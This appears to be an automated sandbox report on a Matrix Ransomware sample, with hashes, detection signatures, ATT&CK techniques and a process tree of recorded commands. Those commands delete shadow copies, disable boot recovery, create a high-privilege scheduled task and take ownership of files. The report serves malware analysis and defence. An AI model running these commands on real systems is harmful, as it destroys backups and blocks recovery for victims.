Analysis
-
max time kernel
151s -
max time network
16s -
platform
windows7_x64 -
resource
win7 -
submitted
08-10-2020 15:06
General
-
Target
bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2.exe
-
Size
1.1MB
-
MD5
837d96ee65e177210ad77e0b7a3e2ee1
-
SHA1
9f96a1acbcf006bf9cc61119dc76ca47adf63066
-
SHA256
bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
-
SHA512
3369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 495 IoCs
Targeted ransomware with information collection and encryption functionality.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Blacklisted process makes network request 1 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 3 IoCs
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
-
Sets service image path in registry 2 TTPs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 4 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 11 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 7637 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies Control Panel 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 47 IoCs
-
Suspicious use of WriteProcessMemory 108 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2.exe"C:\Users\Admin\AppData\Local\Temp\bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2.exe" "C:\Users\Admin\AppData\Local\Temp\NWt29TaW.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\NWt29TaW.exe"C:\Users\Admin\AppData\Local\Temp\NWt29TaW.exe" -n2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\u0rUqag5.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\HMC7e7et.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\HMC7e7et.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Y4WPsKrv.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Y4WPsKrv.vbs"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\okwFHopK.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\okwFHopK.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Bhhh00dX.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ZG413Grv.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ZG413Grv.exeZG413Grv.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\ZG413Grv64.exeZG413Grv.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8F50FA56-A5DD-4327-825B-4CB6264842BB} S-1-5-21-1131729243-447456001-3632642222-1000:AVGLFESB\Admin:Interactive:[1]1⤵
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\okwFHopK.bat"2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
5e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
MD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
MD5
75a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
MD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
MD5
b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
MD5
df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
MD5
be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
MD5
97b178c73d27fe1b1ff0a5cfc1ed8585
SHA1de31405ecd69ec51f31be86ec25fea2abb151721
SHA25682cfd65d5f38aef7c79dafb3e069a7177313c313d27d6b8bce479bf43a308607
SHA51231dac69dfae543591af24b898697df0e73d052a00456dd3713b0cc1ce49e8782ae8b7ec69475f0bc85593e8c6050896b566fa8f8bc8d7d90562d18f47f5fa1be
-
MD5
ccef04cb504305fb1bb33425d295931f
SHA19be0c089590f3bfec11976eb012e5e3d1d99d5d1
SHA2569e3bfb61737e38c520f7a2b373833b8c61ab1b487bfe2798fd45158005ab1c04
SHA512c5d0b9f7b27a323d5f5769ba2040592751cbb2a4f36ac8fc95f637024353b107a18976e448ed04f8accc996d4f53e3513cbd857a45decf8627da7b121e5a21af
-
MD5
837d96ee65e177210ad77e0b7a3e2ee1
SHA19f96a1acbcf006bf9cc61119dc76ca47adf63066
SHA256bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
SHA5123369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
-
MD5
837d96ee65e177210ad77e0b7a3e2ee1
SHA19f96a1acbcf006bf9cc61119dc76ca47adf63066
SHA256bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
SHA5123369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
-
MD5
2f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
MD5
2f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
MD5
3026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
MD5
75564e2df4b8c8d33695e8e5e58cb03c
SHA164a796a9f01a1f12bcbe641ecc92541a41ece9b5
SHA256bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965
SHA512c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af
-
MD5
b57836bc3f11de3a486d1d4604025a5a
SHA1a512c4d6e308216dd6812bb15764bf6399d7fa04
SHA2566a8637540f4c77d7804a8afe8b9e0752ef8c8c30314c90b1b873b31e2600fa3a
SHA512cf1a08a053cbea5bdd21745bf61990f35b075f5fe676ea177080ea0a5e20f05f6cc5adb0396700874a1ebb13c1bec444e8454867a7453be66a0532f64085df2e
-
MD5
321b5b696c5b2e56bc6239ffc2f02baf
SHA1cb6e709eec1d29ab893d910275c0d0c4d3556685
SHA256c413ece0eca41d867452a2e0d35236e8fa474a52ed0267eecbd60e0ac2466a0e
SHA5120cc7b1b5953e34f45a7c373af38d5dd9cab759b4fae7ac0fd9e4c9d518af047720c45f176236508a4cebe0a015345235cc598f9334b75f1e3325ec8d688bbad2
-
MD5
837d96ee65e177210ad77e0b7a3e2ee1
SHA19f96a1acbcf006bf9cc61119dc76ca47adf63066
SHA256bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
SHA5123369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
-
MD5
837d96ee65e177210ad77e0b7a3e2ee1
SHA19f96a1acbcf006bf9cc61119dc76ca47adf63066
SHA256bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
SHA5123369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
-
MD5
2f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
MD5
3026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
16KB
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-